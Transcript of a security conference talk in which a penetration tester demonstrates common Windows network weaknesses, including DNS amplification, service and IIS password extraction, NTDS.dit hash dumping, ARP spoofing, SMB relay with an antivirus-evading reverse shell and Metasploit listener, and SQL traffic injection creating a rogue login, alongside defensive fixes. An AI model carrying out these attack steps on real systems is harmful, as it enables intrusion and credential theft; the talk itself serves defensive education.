Thank you so much. Thank you. Thank you. how is everybody doing? Good? Okay, fantastic. So let's hit the road with the presentation. Just a few words in general about what do I do in cybersecurity and what the session is going to be about. First of all, welcome. Thank you for coming. Thank you for your time and thank you for being here. Apparently, you must be excited about cybersecurity, and that's basically what we're going to be doing today. My session is full of demos, so just a small warning for you, because if you are prepared for some lightweight presentation, that's definitely not here. It's going to be very techy, and this is pretty much what I do. As you could already hear, I'm the CEO of CQURE. CQURE is a company that I've established 10 years ago, and we are right now in 4 places in the world, which is New York, Dubai, Switzerland, and Poland. Originally, I'm Polish. I live in Poland, though I technically spend Saturdays over there. And what is my passion? It's doing the penetration tests, or as we call it right now, pretty much evaluating the cybersecurity posture of our customers all around the world, also in that region. And basically, I do something that popularly people call hacking, but in our team, we call it researching. Our team right now is 38 people, we've grown. I was the only one, and right now it's 38 of us. Apparently, cybersecurity, as I mentioned before, must be very interesting. And I'm also the Microsoft Regional Director. It doesn't mean that I work for Microsoft, don't get me wrong. It sounds like a bad title, so to say. Because the director is something like normally inside the companies. This is more like an honorable role for people who can convert Microsoft technologies into something valuable, yeah, at the customer side. So this is basically what I got from the Microsoft, and it's per country basic, so I'm the MRD for Poland. And what do I also do, very short, is I'm happy and I really like to share knowledge, because our team writes tools and we do a lot of R&D in the cybersecurity field. And we have written over 200 tools, which we always share at the various conferences, etc. Like for example, this year's Black Hat and so on. So a couple of places I like to speak, you'll probably notice that. I also had a chance to be like, whatever, Microsoft Ignite speaker, I will be also at Ignite. But it doesn't really matter really, because as long as you're interested guys in cybersecurity, that's perfect. And also what we always do on the presentations, and I'm really excited to do it over here as well, is that we do, after the presentation, when I finish, bang, we publish the tools. Yeah? So at the moment we finish, it should be online. Yeah? So it's like very synced. And you're going to find that information on our blog, on our website over here. You're going to find it over here in CQURE Academy. This is our educational part of our company / blog. So when I finish the session, there is a summary of the session and the tools that you will be able to download, including the presentation. So that you, when you're going to leave, you're going to leave with something actually, yeah, besides your notes and something that you're going to remember. Yeah. The tools, of course, are at your own responsibility, blah, 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 blah. Yeah, you know that stuff. Most of them are and can be used for hacking, and that's basically what I use them for. When I go to the customer side and we deliver the penetration tests, the tools are actually used over there. So can you do damage with the tools? Yes, you can. Just be aware of that, but not to yourself. Yeah. Okay, guys. So let's start the presentation. This is a little bit of a summary. Now, we're talking about this top 10 ways to make hackers excited. So what are those? Yes, is it really only top 10 ways? Now, of course, it's not only top 10 ways, but it's a top 10 out of everything that we have found out at our customer sites. And before we really get into the conclusion, what are the top 10 ways, just a few words and a little story. So every single time I'm getting to the customer site, I can tell you one thing, that I'm very excited. Yeah, like constantly, there's a pen test going on, I'm traveling next week to US, I'm gonna do pen test for the financial company, and actually I'm already excited when I'm thinking about it. But there's always this thing, I'm a little bit of naive person in that matter, I can tell you, that it's almost like when you've got a kid, and the kid drops the ice cream. Yes, you were like, oh no, Yes, it's like a very sad thing. Some people are laughing, this is cruel, but most of the people are like, oh, this is really bad, yeah? So it's really literally the same when you're getting to the customer side. On the calls before the project, we have always like, hey guys, you need to come over, you need to test our infrastructure, we've got like 3 anti-spam filters. I'm really sharing with you the real stories. This is a customer from Dubai, actually. We've got 3 anti-spam filters, and I'm pretty sure you will not be able to get in, but come in and check it out. And we're like, that sounds really good. Yes, that sounds like they really spend money on cybersecurity and they do it wisely. Nothing more wrong. It's usually the same, that I'm getting excited about these 3 anti-spam filters, and then I'm getting to the customer side, and then it's like, it's like the ice cream is dropping, yeah? You're like, the same things happening all the time, same mistakes, same issues, same misconfigurations, oh my god, yes? So in general, this is what we're going to be talking about, these top 10 things that sometimes we call an apex of the industry, because for real, they work, and that's a bit of a problem, yeah? So, question is, of course, what's the first thing over here? First thing, and that sounds very obvious, don't get me wrong, but we're going to get technical in a moment, is disabling the firewall on the servers inside the infrastructure or on the workstations. Yeah? Now, we could be like, yeah, blah, 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 firewall needs to be turned on, and again, sounds very obvious. Not really, because in the times of a ransomware, and ransomware right now has its 5th anniversary, is actually communicating from the inside to the outside. I can tell you that within the statistics that we have inside our company, only a couple of customers, they are controlling not only the firewall that is turned on the workstations or servers, but they are also having a rules build up so that they are saying which executables are allowed to communicate out. So if I do run something, for example, on my workstation, and that's going to be some bad piece of code, that bad piece of code will never connect out to the internet because on the firewall it is configured to not to do that. So the outgoing rules, simply speaking, are there. It's not like everything can go out and nothing can get in. That's like a classic thing from the past 10 years ago. So what we are saying over here is that we should have the rules that are blocking certain types of executables and the outgoing, of course, and incoming traffic. Now, in a vast majority of infrastructures, or like 99.999%, they are all vulnerable to amplification attacks. And that's a bit of a problem, because the firewall responds to the known type of communication, I mean, the service that is behind through firewall responds to that, and effectively, we're able to deliver this type of attacks. Now, question is, of course, what kind of attacks we are talking about? Well, we are talking, for example, here about attacks like DNS blast, or like attacks for SNMP, or attacks for the SQL Server, etc. And at some point, I would like to show you how to deliver an attack like that, and what does it mean to deliver it. The first demo, don't get me wrong, it will not be very exciting, because I will just show you how to deliver the attack. But effectively, what happens is that services in your network, they start working slow. Yeah, so sometimes you're going to have some kind of a timeout, sometimes you will experience some issues, etc. So that's what you're getting. Yeah? So it's kind of maybe sometimes hard to demonstrate it, but to deliver this attack, it's so easy. Yeah? So effectively, what I'm going to use for that, it's a DNS blast script that is publicly available. And I'm specifying over here the address of the a certain type of a server. Yeah? So it's going to be 10.201.211. And effectively, that ratio that you got, it's a success ratio that is, and as you see, increasing. So we are basically, right now, flooding the network with the DNS traffic and amplifying the response types among that particular network. That means that if someone makes a DNS query in your network, then we are amplifying it multiple times, so that the server is technically busy, yeah? So what's the scenario for that? And as you see, this is increasing. Once we're going to get to 100% or something close to 100%, that would simply mean that we are killing the particular service within the network. Yeah, so maybe we should just stop it. Now, this is how easy it is. Now, what's the applicability to infrastructures? Pretty much every network is vulnerable to this. Yes, because it's just a DNS. It's a protocol from before 80s. Yeah. So how could it be a secure protocol? It's not, yeah? So it's a pure text. Now, how can we defend from that? Well, that really depends. But within the firewalls, or different types of firewalls, you have anti-amplification attacks rules. Within the Windows Server 2016, you have actually a built-in tools that are allowing you to actually maintain the problems with the amplification attacks. That is actually a PowerShell CMD lens, which is called Set DNS Server Response Rate Limiting. And if you search for the response rate limiting, you're gonna find a very nice article on Microsoft site, where you are able to specify on how many responses within a certain amount of time your DNS server should produce. As simple as this. And if you're gonna ask for more, it will simply not do it. And you are able to specify the rules on that, yeah? So just basically check it out. This is something that is actually quite easily fixable. So let's get into something cooler. So effectively, when we are thinking about the top 10 ways to make hackers excited, this is the moment where we are actually reusing the passwords. Now, and of course the places where we are able to find passwords. Now question is, where are those passwords saved and how they are saved? And don't get me wrong, we could be actually being here for the next couple of hours, because there are over 20 places in Windows, in the Windows operating system, where you are able to extract the passwords in the clear text. And I'm not talking about hashing over here, forget it. I'm talking about the places where you actually configure something, say something, and that password is stored over there. Now, we're gonna get a little bit difficult over here, because I would like to show you, first of all, the services and the services password, where you are able to extract them and how, and I'm gonna use our tool for that. Secondly, I would like to show you where the passwords can be stored within the IIS configuration, and that's gonna be fun. And for the third thing, I would like to show you how you are able to extract the hashes from ntds.dit to verify if your users are actually reusing the passwords, yes? So it's going to be very quick, very efficient, and for two of these things, I'm going to use our tools, yeah? So, yeah, let's do it. No time to lose. So, basically, I'm going to get into services MSC. And I got over here a very important service, which is running on the Freddy Krueger's account, yeah? And normally, when you've got services, they are running on the specific type of accounts. They can be running, they can be running on the GMSA, Group Managed Service account, but not every type of a solution supports it. So this is a very typical situation in the organization. And I'm not really saying if it's like a regular account or administrative account, it doesn't matter for what I'm going actually to show you. So the password is preset. It says that the logon name will take place if we're gonna restart the service, which we don't care about because that actually goes to the registry. So what we're gonna do right now, first of all, we're gonna start the command line, and let me do one thing over here. So within that particular command line, just a quick thing, I'm gonna just run one tool if you don't mind. I'm gonna get into tools, and very, very quickly, I will actually launch over here a psexec, and psexec, some of you might already know it, I'm gonna run with three parameters, minus S, minus I, minus D, cmd.exe, and that is in order to actually start this command line with the local system privileges. Yeah, so this is pretty much the situation. PSExec, by the way, it's signed by Microsoft. If you read the license, it's actually mentioned that you're not supposed to run it or use it for hacking purposes. Of course, nobody cares, because who is reading the license? A, B, who cares? During the hacking process, like, oh, I'm sorry, I'm a hacker, I will not use it because it's against the license. You really? Okay, so let's move forward, yeah? So right now we've got a console which is running as a local system, yeah? Now, what is important to know in our whole process is basically how the service account passwords are stored. And let me move very quickly to my tools area, not to test, but to our tools. Go. And I got over here CQ Secrets Dumper. This is one of our tools that, as I mentioned, they are available for free. All of them are on our website. This is one of our best tools, really, where you are able to specify the service. So let's do it. And the service short name. So TENASRV was actually the shortcut for the very important service, where I specified that to be running on a certain Freddy Krueger account. And I put the password, yeah? So that password is stored in an encrypted way in the registry, but if you do have a privileges, you're always able to get them. Now question is, who is logging on to your servers, yes? Because this is actually showing one of the problems, accountability, yeah? So if you've got a server which developers use, and you've got a, it's a SQL server, for example, installed, very specific situation, on the account, your developers are logging into that server, do you want to be that kind of service account? If you do, you can. That's the bit of a case. Is there any fix for that? Yes and no. Let's start with the bad part first. So no, there is no fix for that because this is exactly how logon as a service works in Windows. It's a type of a logon basically that allows us to start services, not to logon interactively and still be authenticated. Yeah. So answer is no, you cannot fix that. Can I kind of like work around this? Yes, you can, by using group managed service accounts or by implementing on the server code execution prevention that prevents you to execute the code that you don't know, A/B, log on who is actually logging onto that server. And these are the ways really to fix this. Yeah. So is this something that is making hacker excited? Yes, I'm very excited during the pen test when I see the service with the account because I know that I can take it and perform something that we call a lateral movement. So I grab the password and then I jump farther to the other servers. Bang. Yes, so this is a bit of a situation. Okay guys, so this is the first thing. Second thing that I wanted to show you is actually related with the IIS configuration. Yeah, and this is basically touching base on the data protection API. And what do we mean by this? There are a couple of places really to show you is that within the web server, and it's not that IIS is bad, don't get me wrong, it's actually very good. Yes, so from the 2007, if I'm not mistaken, there were 23 vulnerabilities only, so it's actually quite nice. But effectively, what you need to know is where and how things are stored. So these are application pools, the ones that are used to create a result of your request. So if you hit the website, these guys produce you the response and they're like, hey, that's your website, yes? Like for example, for SharePoint. Now effectively, these worker processes, so application pools, they have to be running with a certain type of identity. Sometimes they can be running with application pool identity, and that's okay, but some developers configure it for running on a specific account. Like you have over here, as an example, test.com, Freddy Krueger, yeah? Now question is, how can I eventually grab a password of this account? Is there a way I could do it? If I go to the advanced settings, basically, there is this identity, process identity that I can configure. Normally it works like this, that you can set it, yes? So this goes somewhere. And this is actually going, I will tell you, into the application host config file, but in the encrypted form. Now, is there a way to verify that? Of course, there is. And let's technically do it. I'm gonna maybe even go from this perspective. So if we're gonna get into Windows System 32, let's do that. Here we go. And then we're gonna go to inet SRV, and then we're gonna go to config. Here we go. We've got over here, let's do notepad, application host config. Okay. And over here we can search for Freddy. Perfect. And what you have over here, and this is what I wanted to show you, is this. Yes, yeah, so Freddy Krueger password, and that's the password that is encrypted. It actually says so, because it says IIS, Windows Activation Service, by the way, it's called Windows Process Activation Service, to be picky, but okay, only AS provider. So it's a symmetric cryptography. Okay, fine. Where's the key? And the key is only in one place in Windows, and that is Data Protection API, and that is actually encrypted by the local system's password, and that is actually stored within the registry. So there is something always persistent that needs to be unencrypted so that you are able to encrypt the other things. While we can see AS over here, we're like, oh yeah, perfect. Symmetric cryptography, I'll be able to grab it. So how do we grab it? Either you dig in into the keys, or you use tools for that. Because some of the tools are actually allowing you to perform this operation. So let me show you how we can do that. Since we are in Windows System 32 inet SRV config, we're gonna get one folder back. There is a tool which is called appcmd. And appcmd we can use for that purpose. We can do list app pool, okay, www.test.com/text and asterisk. This command allows us to list application pool settings. okay, including the ones that are from the configuration file. Now, question is this tool, like, what is this tool doing? And I can tell you that that tool queries a service, Windows Process Activation Service, which you had mentioned before in a file, and what it does is in the context of that service account, it actually decrypts the content of the configuration file. That's how the tool works, yeah? Now, this is my personal comment, if I really think that there's in Windows some kind of a tool that was made in hell to make our life miserable, it's really application UpCMD, because the logic is definitely beyond the earth. Yeah, really. Okay, anyway, let's find out. So what we got over here, it's the output, and let's find, it should be somewhere in the very beginning, of basically where we're able to find the password, yeah? And what is kind of cool as well, and I just take it over here, is that for Freddy, yeah, we will grab it, I'm sure, yeah, we can see it already. Here we go. The password is, let's just do it in green over here, yeah? So it's decrypting it on the fly. Now, as I mentioned, there are over 20 places like this. Every single time you put the password somewhere, you need to think about how do you actually encrypt it or how things are actually encrypted. And every single time you put it, it can be decrypted because password is only stored in the form of a hash for the logo. For the other details, it has to be decryptable because some other mechanism needs to use it. Just keep that in mind, yes? So when you reuse it somewhere, when you use the same password for your account and for the service account, etc., during the hacking process, that is to be found. And I love to find places like this. When I find a password somewhere, I try to reuse it all over, and there is always pretty much a place when it works, yeah? So that's something that I wanted to show you. Okay, guys, so now, the last thing in that matter is actually related with extraction of the data from the ntds.dit, yeah? Now, there are a couple of places and a couple of ways you are able to use it, but effectively, what do we need to have is two things. The copy of ntds.dit and the copy of system-hive. Why? Because there is a boot key. Boot key, it's a short key, I'll show you how it looks like in a second, that allows us to decrypt the content of the ntds.dit or slash some database to get the hashes so that you can crack them. Some database in general remains encrypted with the boot key, which is actually so simple to follow because if you, for example, locally have a some database, in order to be able to get the hashes, get access to hashes, you always have to have a system hive, these two, yeah? So how do we do it? Let me get there. And I would like to show you how we are able to technically extract this data. First of all, we need to have a copy of system and ntds.dit. How do you make a copy of that? Shadow copy, maybe offline extraction, etc. VSS admin create shadow. Yeah, so there are plenty of ways you are able to use for that. I already have a copy for that. And what I would like to show you is how to technically get this particular data out. So first of all, NTDS, yeah, so this is one of the tools. It's called CQNTDS DT Decryptor. To be sincere, I'm a little bit of a pedant person, and when I see the tool that I don't like, we always like, let's write ourselves our good one working in every conditions and so on, so that it's gonna be perfect, yes? That's pretty much the tool like this, yes, so enjoy. And effectively, what does it do? It takes a couple of parameters. It's easy. First of all, the boot key. Secondly, the file. This is really the only thing that we need. So the file that we're gonna use for that, CLS, it's gonna be like this. Yeah, so we're gonna do boot key. And the boot key, we have to extract from the server or from the system hive. So pretty much we need to choose of what we're gonna do, but effectively, this is something that works in a following way. So this is the ntds.dit that I took from this server, and I have over here CQ secrets dumper that you guys already know, and I will just use a different switch, which is called boot key, and that gives me this particular value over here. This is the value that is like a super crucial value in the operating system because it encrypts pretty much all the system secrets. So once you get it, anything system related, it's decryptable. And effectively, We're gonna do it over here. So we've got a boot key, paste it, and then we're gonna do specify the file. And we got the file already. And technically, we're gonna put here ntds.dit, yes? And one of the things that we can do over here is, of course, the out file. So just for the reference, let me show you something. We've got an out file, pfx file, and kds root key. Mm-hmm. So we can do pretty much all of those, but let's just do the out file right now. So out file hash.txt, and let's keep it this way, yeah? So effectively, in the hash, this is okay, of course. Hash.txt, I have it open in front of me. Basically, this is the list of the hashes that you've got within your domain. Now, if you have like infrastructure that is like a couple of thousand accounts, this is a piece of cake. What is important over here is that this is very nicely importable to Excel spreadsheet. And if you want to find duplicates, which means that someone is actually reusing the password for various accounts, this is a perfect way of doing it. It's ethical at the same time because you're not cracking anything. The only thing you see is the MD4 or someone's password. In Windows, we use MD4, yeah? And you're like, oh, this person is the same. I can tell you, in our experience, for administrative accounts, administrators, they have an account of whatever, let's say, John, and then we've got a John ADM or ADM John for the administration. You wouldn't believe, so oftenly happens that domain admin accounts have the same passwords as the regular accounts of the administrators in the organization, seriously. Yes, and if that's like a domain admin, then for sure it's like a privileged help desk person having pretty much the same stuff. So to be checked. Okay, guys. Interesting so far? Okay, awesome. Thank you. So let's move forward. Couple of things to mention as well. So basically, one of the things to be noticed as well, and this is really what makes hackers excited, is the no network segmentation or poorly done network segmentation, yes? Why like that? And this is like a super simple demonstration. Because if there is no network segmentation, then obviously network is vulnerable to all the type of spoofing slash sniffing or sniffing slash spoofing activities, yes? Then it means that you are able to clearly and easily spot all the type of activities that someone is performing within the network, yes? Now, what I would like to show you, it's the simple demonstration where we're gonna be playing with the spoofer. And the spoofer is gonna be very easy because it's actually a spoofer that is coming from our team. So let me show you how that works. And effectively, I would like to show you how we are able to spoof the communication. And it's not really because something is in a clear text, it is because we are actually spoofing the network. So what happens over here? We are flooding the network with the vogue error P queries, and effectively we're making the switch to be flooded to get into the port opening mode. This is the beauty of the spoofing slash sniffing activities, yes? And our CQURE spoof is one of the few tools that actually works on Windows. Yeah, so you just launch it this way, and you launch anything of any type of a Wireshark, and you're gonna get everything in the clear text that whole subnet is actually processing. It's that easy, yeah? Everybody can do it. So effectively, what we're gonna do over here is we're gonna technically, we're gonna launch this particular tool. Let me get to the tool first, CQ, here we go, and then perfect. So right now, we are starting the whole activity. Yeah, starting sniffing, okay, spoofing, fantastic, great. So the only thing I can do right now is to pretty much get to one of my clients and start some kind of activities that's gonna be captured by this, yes? Inside the tool, we have different types of filters and effectively, these filters are triggered to listen to certain types of protocols. I know that FTP isn't very exciting, but what I wanted to show you is that I'm connecting from my client, so 248 at the end, to 10.10.10. This guy over here, just for the reference, yes, it's the other other guy, so it's a 104, so completely not related, and this is really what the spoofing is about. And I will just type whatever over here, yes? And effectively, on our side over here, we should be able to see that particular communication. Yeah? So any type really of a communication like that is to be grabbed. And based on that, we're gonna build next attack. I have to introduce you to this so that we can get into something more difficult, yeah? We're gonna play with the SMB protocol, but this one in the moment. This is, by the way, the attack that is always working within organizations. Before we get that, a little bit of summary, yeah? So what we were and what we're talking about and what we just did is that ERP spoofing on Windows. ERP spoofing tools are available widely, but effectively, they are always working and they're allowing you to not only sniff the communication, but also change it on the fly. And that's a bit of a problem, yeah? Good, so having this in mind, let's get into something more difficult. Now, before we get there, a little bit of a story, if you don't mind. The story goes like this. Sometimes we've got projects in cool places. Yeah, I mean, everybody wants to have a project in Bahamas. I guess you too, yeah? So when we get this customer request to come to Bahamas, I was like, I'm the CEO of the company, so I cannot really say like, oh, I'm gonna go because I should be the last one, really not to demoralize everybody. Yeah, so that the first people can go and then I'm the last one to go. And I'm like, shoot, I really want to go to Bahamas, yeah? And we're checking the calendar and it looks like I'm the one to go to Bahamas. Yeah, score. And I'm like, I'm sorry guys, I have to go, yeah, sorry. And effectively, when I'm getting there on Monday, I'm setting up my whole environment for the hacking activities, for the SMB relay attack, which I will show you in a moment. And technically, I'm sniffing, and there's nothing going on in the network. It's Monday, nothing is going on, like nothing. I'm like, what's wrong? Maybe my interfaces are wrong, maybe something happened. I mean, you know, like sometimes it happens. So, okay, I'm like rebooted, set up everything and so on, and there is nothing going on. And I started to be really nervous. Like, I'm like, oh my God, like, is there something wrong with my laptop? Something wrong with my machines, etc. And you know what was the problem? That after the lunchtime, I started to see the traffic because from the breakfast time until the lunchtime on Monday morning, nobody was really working and doing anything in the company. They were in the conference room eating donuts, really. And they were exchanging like information. How was your weekend? How was your dog? And I'm like, what? And after lunch, bang, then it went through. This was the longest time I ever waited, by the way, for that attack to succeed. Normally it's like 5 minutes, you got it. But this was like the hell longest. Anyway, let me show you. It's gonna be very straightforward. What's the SMB relay? And this is something that we have to explain ourselves first. Yes, let me show you my art skills. Very poor, by the way. So what's the situation? The situation is that this is the computer. It's not a mushroom, if you wondered, it's a computer, yeah? There is a server, file server. The NTLM version 2 communication works this way. There is this guy saying, hey, I want to get access to your resources. Sure thing, this is a bit of a blob. Take this blob and encrypt it with your password hash, with your MD4. And this guy is like, yeah, I know what's my password. So effectively, this is the blob encrypted with the MD4. Now this guy, and we are all connected to the domain, so AD, and there is this, of course, hash database which we're able to verify what's the hash of the user, do the same operation on the server side, and have this blob encrypted, and it's, this one equals this one, which means, fine, you're authenticated. This is NTLM version 2. Now, where's the deal? The problem is that if you do have a bad guy coming, and this guy performs these activities as I showed you, so performs, for example, ERP poisoning and so on, so techniques that are used for sniffing, spoofing, etc., then this guy can technically trace this communication. And the problem with the current times, and this is like really bad, like absolutely bad, is that this piece of data, it's forwardable. That's why we call this attack SMB relay. We can relay it to some other server, server S, yeah, and the problem is that if you relay it this way, just like that, you are able to authenticate. Yeah? It used to be that you could do this way. Yeah, this was in 2008, that was a vulnerability, and it was patched, but it's still very vulnerable. I wouldn't call it really vulnerability, I'll call it inconvenience, yeah? That we have to manage. It's a very nice way to call something that is crappy, but still, yeah? Let's find out how we are able to perform this attack and how quickly and easy we're able to get access to someone's infrastructure. And again, what's the fix? Because there is a fix for that, let me tell you even right now, is to actually sign, put the digital signature on this. Yeah, so enable SMB signing. That is the answer over here. Now, let's dig in into the attack and how it works. So basically, for that purpose, we're going to use two boxes. We're going to use for that the Kali Linux guy. We don't have to, by the way, but since it's actually widely available, why not? And we're going to use for that our payload generator. Now, why our payload generator? Why not, for example, MSF Venom or something like this? Because our payload generator, our team's payload generator, is the one that generates payloads that are not recognized by antivirus. This is a bit of our know-how of a team, which is good for pen tests because I don't care about any antivirus, it just works, yeah? So let's just do the zoom in part. And what we're gonna do here is, we're gonna specify the Python script, and that's gonna be our SMB relay XPY, and we're gonna run it in a various ways, or actually in a certain way, where we're gonna specify technically what kind of payload we would like to give over here and where we would like to connect to, yeah? So that's gonna be a bit of a case, yeah? So we are technically doing this one, let me just put this over here, here we go, like this, oh yeah, perfect. So we've got our SMB relay X minus host, and our host, our victim, over here, it's going to be 10.10.10 250. So this is our client, this is going to be our victim effectively. And minus E for execution. And then we're going to specify over here CQURE shell 104A.exe. Now, effectively, the CQURE shell, as I mentioned, is generated by our payload generator. Just for your reference, so that we have a whole circle close over here, what we are talking about is this one. Dear reverse. This is our reverse shell generator, CQURE reverse shell generator. Here we go, enter. And it takes two parameters, IP and port. And it generates you an executable that when you click on it, it will connect with the reverse shell to that IP address and to that port. Super simple, yeah? So just for the reference. So here we go. And so this one is pretty much ready, the relay attack. Now, what we need to do is to set up the Metasploit over here to perform the listening over incoming requests. And this one I already did. Just a few words for you how this was actually done and what matters over here. What matters over here is this. First of all, use exploit multi-handler, and that's what I did. Second, set payload Windows Meterpreter reverse TCP. And this is pretty much the only thing, show options. I set the localhost, that you don't have to do it normally, I just did it to be 100% sure, and that's it, exploit. So now, what happens, perfect, is that the script, the relay Python script, listens, performs the RP poisoning, and listens to these queries for the authentication, yes? So this is basically the situation. Now, what we are waiting for over here, is the certain type of connection over NTLM version 2, and that is actually happening when you connect through the short name or the IP address. Yeah, that's why, for example, having the Kerberos well done in the infrastructure, it's a gold thing. It very rarely happens that we see the Kerberos done well. There's a lot of mistakes. NTLM version 2 is allowed, for example, and it shouldn't be if you don't have to, etc. Yeah? So this is something to pay attention to. Now, what I'm gonna do on my side is two things. First of all, I'm gonna authenticate to the service by launching some kind of a server, yes? And I'm gonna use it to authenticate to some kind of a service. That's it. That's gonna be the only thing. Second thing that I'm gonna do is to show you my victim. And that is important. So this is a victim coming. And that particular victim, yeah, over here, this is like a local account or whatever. But what I would like to show you is basically within the task manager, what we're gonna be touching base on, yeah? So which process is going to be the one that we're going to hook into? Of course, as a hacker, I don't know that, but I would like to make things clear, yeah? So that we've got, as I mentioned, full circle for the whole explanation over here. Now we're gonna probably hit one of the SVC hosts. Why like that? Let's choose this 980 because it's easy to remember. Because SVC host, it's a service hoster. Yeah? So basically, it's a process that is easy to interact with the small risk or low risk for giving you a blue screen. Yes, because you can technically inject things into SVC host, run things through SVC host. That's normally how services react in Windows. It's very like robust. So if you do it in a client server on M2 system, goodbye. If you do it in the local server LSASS.exe, local security authority subsystem, goodbye. Yes, so this is something that we don't want to have. So 980 is going to be our victim over here. Okay, I can close this guy because we don't need to know that. And now on my side, I will authenticate to the service using the IP address so that we actually produce the NTLR version 2 authentication. Okay, so I'm doing this right now. This console should be on the top. This is the one that we're going to be leveraging over here. Ready, ready, let's do it. Let's find out what's the situation. I'm gonna actually, let's see one more time. It's a quite a delicate attack, by the way, so sometimes it may fail, by the way. I'm not explaining myself over here. It's just a reality, yeah? Let's see, basically. Oh, this is okay. Let's see, so for some reason, I see that this guy is not really acting as it should. Let me verify why is that. But as you see in the back, we are actually capturing over here different types of communication already. So this is a bit of a situation as well. Let me just verify if I do have a contact basically to this guy. Okay, a little bit of a quick troubleshooting, I do. Okay, so let me just interrupt this one. Okay, and for some reason it doesn't see this connection as it should. Let me just quickly check one more thing. If config, if we didn't lose anything over here, no, this is good. And ping 10, 10, 10, 200. Okay, fine, that works. Okay, so let me see. This is the victim, okay, fine, exploit. Yeah, let me check on that. In a worst case, of course, we got a backup, but this would be the nice thing to see alive. Yeah, it's a bit sluggish, so yeah. I wonder, like, why like that? Yeah, it's really sluggish right now. Okay, let's do the brutal way. Reset. There we go. Let's do it this way. I really want you to see this. For some reason it went sluggish. I don't know why. It happens, as I mentioned, yeah? Effectively, what will happen is that we will authenticate using NTLM version 2, as we already mentioned. One of my machines over here, so what I'm doing right now, I'm hitting the IP address, effectively. And let me just set it up very quickly for the demo purpose. And then basically this NTLM version 2 should work out for us. Okay, one thing over here, if config eth 0, just to be on the safe side, 10, 10, 10, 99. Okay, fantastic. And the neck mask. If config, we're gonna do eth 0, and that is gonna be net mask 255.255.255.0. Perfect, and locate SMB relay x.py. In a worst case, you will see basically how to set up the attack from the beginning, which isn't also a bad thing. So let's get into share in packet master. Here we go, clear. And that's gonna be our Python script for the SMB relay x.py minus host 10, 10, 10, 250 as for our victim. And minus execute, and for that reason we are actually executing over here. We verify at the CQ shell 104A. Yeah? So let's do it. Minus E, and we've got our CQ shell 104A.exe. Fantastic. And before we do it, just one last thing for that, which is an MSF console, and that's going to take a little bit of time. Yeah. So this is basically, well, the way how we set it up, yeah? So it should just take a small moment and then we're gonna get there. But effectively, you will see, of course, all the steps, yeah? Okay, so this particular, as I mentioned, reverse shell is the one that is not recognized by antivirus. We're already over here, almost there. And let's do the exploit configuration right now. Okay. So we are this one. We just need to wait for this one to be ready. Yeah? So Metasploit is really for listening. We could use the netcat for that or anything really that is listening over here that could also do a good job over here. Yeah. Oh come on. Is there anything? What is this? Action terminated. What? Okay, great. Okay, fantastic. Yep, so let's do it. Use, and we're gonna do exploit, multi-handler, perfect. handler, fantastic. And then we're gonna do the set payload, Windows, yep, meta-threater, fantastic, reverse, TCP, fantastic. Now set lhost, 10.10.10. 99, exploit, ready. Okay, fine. Yeah, so this guy, let's do it. And let's try again of what we got, yeah? So basically, hopefully this will be fine. So we're gonna hit the NTLM version 2 again. And for some reason, it does not communicate well. Oh, that's really weird. I would need to really think about why this is happening. Because there shouldn't be any problem, actually. It looks like, yeah, let's see one more thing. Over here, for the secure tech. Yeah, let me verify that. Because it looks like there could be a DNS issue. Yeah, that's why, basically, it says that there is a problem with the authentication. Because for some reason, it does not technically capture that part of the authentication, but that's okay. We're gonna try to do it from a different machine. Let's try to do it this way. Oh, it's the same. Okay. There are currently no logon servers. Oh, that's really weird. Okay. So it looks like it doesn't really capture the NTLM version 2. I will need to verify why is that so, but effectively, okay. So this is me re-authenticating right now, but effectively, yeah. Okay, let's see for the last time. In worst case, I will refer you to the video where I have that recorded, so that should be, yeah, that should be also the situation. Okay, so it looks like, for some reason, it doesn't really allow us to authenticate, yes? There is some type of a situation over here. I could try to show you this from the client perspective. It could be the case, and let's see if that's gonna be working over here. So let's get into our victim, because our victim really will do a little bit of a help here. Okay, so this is basically this. Just to show you that NTLM in general is captured, because this is really what we need to know. So I'm gonna do that directly to 10.10.10.99 for the simplification. Ah, here we go, yes. So if I do use, for example, something like this. Yeah. Okay, so some kind of a data, whatever that data would be, then basically we are capturing here that type of communication, yes. So in general, what's Deflow? Is that if you do have SMB or if you have NTLM version 2 in the network running, then you are able to capture this type of communication over here. And what normally would happen is that you will actually manage to get the authentication challenge and forward it to the other resource where you will be able to authenticate. There's really one last step that is technically, well, eventually missing over here, but at least you know how to prepare for that particular type of an attack. Okay, guys, so what's next coming? Yes, so a couple of things to mention, yes? At the very end, allowing unusual code execution. So when we do execute this payload, it can run, and that's a bit of a problem, yes? For that, we've got things like AppLocker, we've got things like device guard, we've got things like Carbon Black and any other types of code execution prevention solutions that can help us over here. Now, following that with a no whitelisting on board, so this is also including the communication that we have within the network, where you are able to effectively communicate out from the certain types of machines. And effectively, one of the other things that I wanted to show you is the old protocols with their default settings. Now, this is actually my last demonstration for today, but it's actually pretty cool, which is related with how we are able to use SQL Server in our network. So in every single company, there is a problem with the SQL Server attacks. Why like that? Because SQL Server, when you've got it implemented, normally does not encrypt traffic in between the client and the server. Now, every SQL Server installation by default has this. We call it TDS, Tabular Data Stream. Now, what I want to show you, and that's going to be actually pretty cool, is first of all, like when I do perform the query from the SQL Server, some kind of an application, whatever, to the database, this query looks like this. And I'm like, select customer ID, company name, etc. So I get the table back, right? So normal situation. Now the problem is that when I do that, my application in the clear text communicates with the server, and this is a default. If you did not preset the encryption of the communication on the SQL Server level, this is technically the problem. And I can tell you that is a problem in vast majority of the organizations, yeah? Now how can we leverage this? Well, over here, I have pre-prepared a command in Linux where we are able to specify that. And for that, I'm using the SQL inject, which is also publicly available. And I'm saying, take this query, and this query, by the way, is visible in the clear text in the network. Yeah? So take this query, SQL inject, select customer ID, company name, etc., and minus I, so do the input instead of that query, run the create login hacker with the password in between these two machines, by leveraging, and again, ERP poisoning attack, which I'm running underneath by using the EtherCAP. I can tell you again, works pretty much in every organization, yeah? So if we do that, let's just run that. Effectively, here we go. Yes, we are right now spoofing. If I do run this query once again, and I do execute, perfect. What you guys see is that instead of getting the table, you've got a command completed successfully. Well, what does it do? It creates us a login over here. Right now, I don't have any login that is called hacker over here, but if I do get into logins, let me just do that. It's through RDP connection, so it's a little sluggish, but we are there. And I do refresh, then basically, you've got a login hacker. And this is happening in every infrastructure, because for SQL Server, implementing encryption doesn't usually happen because it's not a database security administrator installing SQL Server, it's an administrator managing infrastructure installing SQL Server, and the certificates for the encryptions are by default not implemented over there. Classic, yeah? So this is something that I wanted to show you, yeah? Now, one of the attacks that are out there, yeah? Now, for the other things, just to sum up, trusting solutions without knowing how to break them. Lots of monitoring solutions, by the way, they rely on something that we call a mini filter drivers. 